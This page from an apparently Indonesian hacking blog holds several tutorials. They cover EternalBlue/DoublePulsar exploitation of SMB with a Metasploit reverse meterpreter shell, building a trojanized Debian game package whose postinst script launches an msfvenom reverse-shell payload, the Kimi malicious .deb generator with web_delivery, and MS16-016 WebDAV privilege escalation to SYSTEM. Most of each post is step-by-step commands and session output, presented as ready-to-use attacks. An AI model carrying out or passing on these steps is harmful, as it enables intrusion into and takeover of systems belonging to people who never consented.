LinuxSec Exploit

Nothing is Ever Locked

Metasploit

SMB Remote Code Execution (MS17-010) Eternalblue and Doublepulsar Exploit

by Jack Wilder 20 Comments

Kayaknya lagi rame ya exploit ini. Lumayan telat sih kalo saya baru nulis sekarang. kemarin kemarin pun sebenernya males nulis karena udh banyak yang bahas. Berhubung tadi ada yang nanya di fanspage tentang tutorial ini yaudah biar sekalian blog ada isinya.

Exploit ini sebenarnya adalah “private exploit” milik NSA yang berhasil dibocorkan yaitu shadowbroker.
Doublepulsar adalah backdoor yang menginjeksi dan menjalankan kode berbahaya di system operasi target, dan ini diinstall menggunakan exploit Eternalblue yang menyerang service SMB file-sharing. Mirip seperti MS08_067 yang menyerang Windows XP dan Windows Server 2003, MS17-010 yang bersifat remote exploit ini juga tidak membutuhkan backdoor yang harus diinstall secara manual (payload yang diklik oleh korban). Syaratnya, di sistem target service SMB sedang berjalan.
Berikut list sistem operasi Windows yang terinfeksi :
  • Windows XP (all services pack) (x86) (x64)
  • Windows Server 2003 SP0 (x86)
  • Windows Server 2003 SP1/SP2 (x86)
  • Windows Server 2003 (x64)
  • Windows Vista (x86)
  • Windows Vista (x64)
  • Windows Server 2008 (x86)
  • Windows Server 2008 R2 (x86) (x64)
  • Windows 7 (all services pack) (x86) (x64)

 

Okelah langsung saja apa yang peru disiapkan.
  • Wine dan NET Framework
  • Metasploit

 

Sebelumnya update metasploit terlebih dahulu. Karena di metasploit terbaru sudah ada module scanner untuk MS17-010 .

sudo msfupdate

Semuanya sudah siap? Oke sekarang kita coba download exploit nya.
su
cd ~
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd cd Eternalblue-Doublepulsar-Metasploit/
cp eternalblue_doublepulsar.rb /opt/metasploit-framework/modules/exploit/windows/smb/
Oke waktunya beraksi (lebay wkwkwk).
Dalam tutorial ini ip target yang digunakan adalah 192.168.48.153. Silahkan sesuaikan sendiri ya.
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.48.153
run
Nah jika target nya vuln akan muncul notis yang menunjukkan informasi sistem operasi yang berjalan beserta arsitektur yang dipakai.
Liat gambar aja lebih jelas nya :
Oke target sudah dipastikan vuln. Sekarang kita exploit.
use exploit/windows/smb/eternalblue_doublepulsar
show options
untuk DOUBLEPULSARPATH dan ETERNALBLUEPATH sesuaikan dengan lokasi dimana kalian mendownload file di github nya tadi ya. Itulah kenapa diatas saya ngeclone ke folder root biar gak perlu ngeganti path lagi.
Untuk WINEPATH ya isi dengan drive_c dari wine mu. Gak perlu dijelasin lagi. TARGETARCHITECTURE juga harus diperhatikan karena akan berpengaruh saat proses pembuatan backdoor.
Untuk payload secara default menggunakan arsitektur x86 (windows/meterpreter/reverse_tcp) .
Namun jika targetmu menggunakan 64bit ubah dengan perintah
set payload windows/x64/meterpreter/reverse_tcp
untuk lhost dan lport sesuaikan sendiri.
Kalau sudah oke, langsung jalankan exploit nya.
Contoh output :
msf exploit(eternalblue_doublepulsar) > run
[*] Started reverse TCP handler on 192.168.48.1:4444
[*] 192.168.48.153:445 - Generating Eternalblue XML data
[*] 192.168.48.153:445 - Generating Doublepulsar XML data
[*] 192.168.48.153:445 - Generating payload DLL for Doublepulsar
[*] 192.168.48.153:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.48.153:445 - Launching Eternalblue...
[+] 192.168.48.153:445 - Backdoor is already installed
[*] 192.168.48.153:445 - Launching Doublepulsar...
[*] Sending stage (957487 bytes) to 192.168.48.153
[*] Meterpreter session 2 opened (192.168.48.1:4444 -> 192.168.48.153:49166) at 2017-05-03 13:41:54 +0700
[+] 192.168.48.153:445 - Remote code executed... 3... 2... 1...
meterpreter > sysinfo
Computer        : WIN-KPGGKF4MPSR
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >
Oke cukup jelas kan ? Sekian tutorial kali ini, jika ada yang kurang jelas silahkan komentar atau bisa langsung pm ke fanspage maupun fb saya.

How to Hack Linux Using Metasploit !

by Jack Wilder 4 Comments

Oke kali ini kita akan membahas kembali mengenai Metasploit. Sebelumnya kita sudah membahas payload PHP yang bisa digunakan untuk meretas sistem linux, kali ini akan sedikit berbeda. Oke langsung saja kita mulai.

A. Pengertian
Mungkin dari beberapa pembaca disini sudah mengetahui apa itu metasploit,

B. Latar Belakang
Banyak orang bilang bahwa linux itu aman dari virus, saya sendiri awalnya juga menganggap seperti itu,disini saya akan sedikit berbagi mengenai How to hack linux using Metasploit !.

C. Tahap Pelaksanaan

  1. Sebelum mengikuti tutorial sebaiknya anda memakai os Linux (Direkomendasikan Memakai Os Pentest seperti Backbox,Kali Linux,dll)
  2. Disini saya memanfaatkan VMware sebagai tumbalnya
  3. Tentunya ada koneksi internet yang nanti untuk mendownload sebuah Package
  4. Buka terminal anda dan masukin perintah seperti dibawah ini

    [email protected]:~# apt-get –download-only install xboard

  5. Setelah itu buatlah sebuah folder di tmp dengan memasukan perintah seperti dibawah ini

    [email protected]:~# mkdir /tmp/linuxsec

  6. Lalu pindahkan package xboard ke folder yang baru saja tadi dibuat, seperti dibawah ini

    [email protected]:~# mv /var/cache/apt/archives/xboard_4.7.3-1_amd64.deb /tmp/linuxsec

  7. Setelah itu masuk ke folder yang baru saja di buat,masukan perintah seperti ini

    [email protected]:/tmp/linuxsec# dpkg -x xboard_4.7.3-1_amd64.deb gamerat
    [email protected]:/tmp/linuxsec# mkdir gamerat/DEBIAN

  8. Masuk ke folder DEBIAN lalu buat file “control” dan isilah file tersebut seperti dibawah ini

    Package: Xboard
    Version: 1.0.0
    Section: Games and Amusement
    Priority: optional
    Architecture: i386
    Maintainer: Ubuntu MOTU Developers ([email protected])
    Description: Mohon Bersabar Ini Ujian

    note : Description bisa anda ubah
     

  9. Kalau sudah buatlah file lagi yaitu “postinst”, dan isi filenya seperti dibawah ini

    #!bin/sh
    sudo chmod 2755 /usr/games/xboard_nilai && /usr/games/xboard_nilai & /usr/games/xboard &

  10. Setelah itu kita buat payloadnya,masukan perintah seperti dibawah ini

    [email protected]:~# msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.117.1 LPORT=1337 -b “x00” -f elf -o /tmp/linuxsec/gamerat/usr/games/xboard_nilai

    note : ubah path yang saya kasih warna merah dengan path anda, dan ubah ip sama port yang saya kasih warna hijau sesuai konfigurasi awal anda

  11. Setelah itu kasih hak akses dan build package tersebut, dengan memasukan perintah seperti dibawah ini

    [email protected]:~# cd /tmp/linuxsec/gamerat/DEBIAN
    [email protected]:/tmp/linuxsec/gamerat/DEBIAN# chmod 755 postinst
    [email protected]:/tmp/linuxsec/gamerat/DEBIAN# cd /tmp/linuxsec/
    [email protected]:/tmp/linuxsec/# dpkg-deb –build gamerat 

  12. Setelah itu copy trojannya taruh di /var/www atau /var/www/html
  13. Trojan kita sudah jadi sekarang anda eksekusi filenya di VMware Dan Meremotenya,,caranya gimana ?
  14. Installah terlebih dahulu gufw < pengertian dan cara penggunaan anda bisa cari di google
  15. Lalu buka Terminal anda ketikan perintah seperti dibawah ini

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 172.16.117.1
    lhost => 172.16.117.1
    msf exploit(handler) > set lport 1337
    lport => 1337
    msf exploit(handler) > exploit

  16. Setelah itu di OS Guest(Os linux yang dijadikan tumbal ,sudah terinstall di vmware)
  17. Masuk ke OS Guest Guset tersbut dan download file anda, dengan memasukan perintah seperti berikut

    wget http://172.16.117.1/gamerat.deb

  18. Masih di Os Guest > eksekusi filenya dengan memamuskan perintah

    [email protected]:/home/guestos# chmod +x gamerat.deb
    [email protected]:/home/guestos# dpkg -i gamerat.deb

  19. Lihat apa yang terjadi di metasploit console anda di Os Host

Kalu muncul seperti gambar dibawah ini berarti anda sukses mengikuti tutorial seperti diatas

Kalau anda masih belum paham dengan tutorial diatas anda bisa melihat video di bawah ini


Kimi – Malicious Debian Package Generator

by Jack Wilder Leave a Comment

Kimi adalah tool yang ditulis dengan bahasa python oleh ChaitanyaHaritash. Tool ini berguna untuk membuat payload berekstensi .deb (paket debian).

Menurut pembuatnya, nama Kimi sendiri diambil dari salahsatu karakter di serial Naruto, “Kimimaro”.
Karena fungsinya untuk membuat paket debian, jelas target nya adalah sistem operasi Debian dan turunannya.
Kelebihan Kimi :
  • Independen. Artinya tool ini tidak membutuhkan aplikasi lain.
  • Dapat diintegrasikan dengan payload generator lain.

Get Start

git clone https://github.com/ChaitanyaHaritash/kimi.git

cd kimi

sudo python kimi.py -h

Cara membuat payload :

sudo python kimi.py -n nama paket -l ip kita -V versi software

Setting up Web_Delivery di msf :


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Oke sekian tutorial kali ini, happy hacking 😉 .

Mengatasi Gagal Add User RDP di Shell Windows

by Jack Wilder 2 Comments

Sesuai janji saya sebelumnya, disini saya akan share sedikit trik untuk mengatasi gagal membuat RDP user saat kita mendapatkan shell Windows. Hal ini biasanya disebabkan user dari webserver yang berjalan tidak memiliki hak untuk membuat user baru. Sehingga kita membutuhkan privilege escalation disini.

[Read more…] about Mengatasi Gagal Add User RDP di Shell Windows

MS16-016 – WebDAV Privilege Escalation Exploit

by Jack Wilder 2 Comments

Share aja barangkali ada yang belum tau. Kali ini saya akan share cara mendapatkan hak akses admin saat kita berhasil mendapatkan meterpreter session dengan metasploit. Berdasarkan CVE-2016-0051, list OS yang bisa dieksploitasi dengan teknik ini termasuk Windows 10 juga.

Berikut list OS yang vuln :
  • Microsoft Windows Vista SP2
  • Windows Server 2008 SP2 and R2 SP1
  • Windows 7 SP1
  • Windows 8.1
  • Windows Server 2012 Gold and R2
  • Windows RT 8.1
  • Windows 10 Gold
Dan exploit ini hanya vuln di Windows arsitektur 32bit ( x86 ).
Seperti yang sudah saya katakan sebelumnya, ini adalah teknik untuk mendapatkan hak akses system admin jika teknik getsystem gagal dilakukan, bukan teknik untuk mendapatkan meterpreter session. Jadi sebelum teknik ini dilakukan, kalian harus mendapatkan meterpreter terlebih dahulu.
Untuk testing, kali ini saya mencoba di OS Windows 7 SP 1, 32 bit.
Oke disini saya anggap kalian sudah mendapatkan meterpreter session.
Lalu dari meterpreter, ketikan perintah background.

meterpreter > background
[*] Backgrounding session 1…
msf exploit(handler) >

nah kita sudah berada di menu exploit kembali.
Selanjutnya masukkan exploit ms16_016.

msf  > use exploit/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > show targets

Lalu akan terlihat daftar target nya. Disini karena yang dieksploitasi sebelumnya adalah Win 7 SP1, maka yang muncul adalah Win 7 SP 1 di id 0.
maka masukkan command :

msf exploit(ms16_016_webdav) > set TARGET 0
TARGET => 0

Selanjutnya ketik show options.

msf exploit(ms16_016_webdav) > show options

Ternyata disini kita membutuhkan session dari meterpreter yang kita dapatkan.
Masukkan command sessions -i .

msf exploit(ms16_016_webdav) > sessions -i

Nah setelah list session nya muncul, kita set session, lhost dan juga lport. ( lhost dan lport sesuaikan dengan yang kalian gunakan saat mendapatkan meterpreter session.

msf exploit(ms16_016_webdav) > set session 1
session => 1
msf exploit(ms16_016_webdav) > set LHOST 172.16.242.1
LHOST => 172.16.242.1
msf exploit(ms16_016_webdav) > set LPORT 666
LPORT => 666

Lalu ketik exploit.

msf exploit(ms16_016_webdav) > exploit
[*] Started reverse TCP handler on 10.208.3.168:666
[*] Launching notepad to host the exploit…
[+] Process 680 launched.
[*] Reflectively injecting the exploit DLL into 680…
[*] Exploit injected … injecting payload into 680…
[*] Done.  Verify privileges manually or use ‘getuid’ if using meterpreter to verify exploitation.
[*] Sending stage (957999 bytes) to 10.208.3.168
[*] Meterpreter session 2 opened (10.208.3.168:666 -> 10.208.3.168:47243) at 2016-08-24 20:31:05 +0700
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM

Yepp, you got the system.
Oke sekian dulu tutorial kali ini, jika ada yang bingung komen aja.

Powered by WordPress and Genesis Framework. Style by LinuxSec.